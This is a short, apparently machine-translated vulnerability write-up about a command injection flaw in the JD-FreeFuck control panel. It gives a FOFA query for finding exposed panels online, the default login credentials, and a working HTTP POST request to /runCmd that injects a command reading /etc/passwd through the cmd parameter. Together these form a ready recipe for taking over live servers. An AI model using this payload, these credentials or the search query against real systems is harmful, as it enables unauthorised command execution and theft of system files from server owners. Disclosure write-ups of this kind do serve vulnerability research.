Vulnerability description

i JD-FreeFuck There is a background Command Execution Vulnerability , Because the content is not filtered when the command is executed by passing parameters , Causes arbitrary commands to be executed , Control server Project address ： https://github.com/meselson/JD-FreeFuck

Holes affect

s JD-FreeFuck

Space mapping

d FOFA：title=" Jingdong HaoMao control panel "

Loophole recurrence

• After visiting, the login page is as follows

• Default account useradmin/supermanito

POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

Personal blog

Lonely and lazy deed ：https://gylq.gitee.io/time